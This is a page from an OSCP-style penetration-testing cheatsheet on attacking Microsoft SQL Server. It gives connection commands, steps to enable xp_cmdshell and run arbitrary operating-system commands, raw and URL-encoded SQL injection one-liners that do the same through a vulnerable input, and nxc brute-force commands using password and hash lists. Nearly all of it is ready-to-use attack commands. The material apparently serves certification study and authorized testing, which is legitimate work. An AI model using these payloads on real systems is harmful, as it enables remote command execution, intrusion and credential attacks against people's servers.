OSCP Cheatsheet
  • Reference List
  • Basic
  • Methodology
    • Basic Scans
    • Service Enumeration
      • TCP: HTTP(S) - 80 / 443
      • TCP: SMB - 139 / 445
      • TCP: FTP - 21
      • TCP/UDP: DNS - 53
      • TCP: SSH - 22
      • TCP/UDP: LDAP - 389 / 636 / 3268
      • TCP/UDP: Kerberos - 88
      • UDP: SNMP - 161
      • TCP: SMTP - 25
      • TCP: RDP - 3389
      • TCP: RPC - 135 / 593
      • TCP: Evil-WinRM - 5985 / 5986
      • TCP: MYSQL - 3306
      • TCP: MSSQL - 1433
      • TCP: Confluence - 8090
    • Extras
  • File Transfer
  • KeePass Database
  • Shells
  • Enumeration
    • Linux
    • Windows
    • Git
  • Privilege Escalation
    • Linux
      • Abusing Cron Jobs
      • Abusing Password Authentication
      • Abusing Setuid Binaries and Capabilities
      • Abusing Sudo
      • Exploits
    • Windows
      • Service Binary Hijacking
      • DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Exploits
  • Port Forwarding
    • Linux
    • Windows
  • Attacks
    • Public Exploits
    • User Creation
    • Password Cracking
      • Custom Rules
      • Custom Password List
    • Phishing
    • SQLi
  • Active Directory
    • Enumeration
    • Attack
    • Lateral Movement
    • Persistence
Powered by GitBook
On this page
  • Initial Connection
  • Connect on local machine
  • Connect to machine
  • Reverse Shell
  • On Machine
  • On SQLi vulnerability
  • Bruteforce
  1. Methodology
  2. Service Enumeration

TCP: MSSQL - 1433

Initial Connection

Connect on local machine

sqsh -S <Target IP Address> -U .\\<Username> -P <Password> -D <Database Name>

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -local-auth

Connect to machine

sqsh -S <Target IP Address> -U <Username> -P "<Password>"

OR

impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -windows-auth

Reverse Shell

On Machine

  1. Initiate connection

If using sqsh, "GO" needs to be entered after every query to send it

  1. Use the master databse

Use master

  1. Get users that can run xp_cmdshell

EXEC sp_helprotect 'xp_cmdshell'

  1. Check if xp_cmdshell is enabled

SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

  1. Enable advanced options as it is needed for xp_cmdshell

sp_configure 'show advanced options', '1'

  1. Apply changes

RECONFIGURE

  1. Enable xp_cmdshell

sp_configure 'xp_cmdshell', '1'

  1. Apply changes

RECONFIGURE

  1. Run command

EXEC xp_cmdshell '<Command to execute>'

On SQLi vulnerability

  1. Enable advanced options as it is needed for xp_cmdshell

'; EXEC sp_configure "show advanced options", 1; -- //

  1. Apply changes

'; RECONFIGURE -- //

  1. Enable xp_cmdshell

'; EXEC sp_configure "xp_cmdshell", 1; -- //

  1. Apply changes

'; RECONFIGURE -- //

  1. Run commands

'; EXEC xp_cmdshell "<Command to execute>"; -- //
One Liner

Raw:

'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "<Command to execute>"; -- //

URL Encoded:

%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22<Command to execute>%22%3B%20%2D%2D%20%2F%2F

Bruteforce

nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -H <Hash List> --continue-on-success
PreviousTCP: MYSQL - 3306NextTCP: Confluence - 8090

Last updated 18 days ago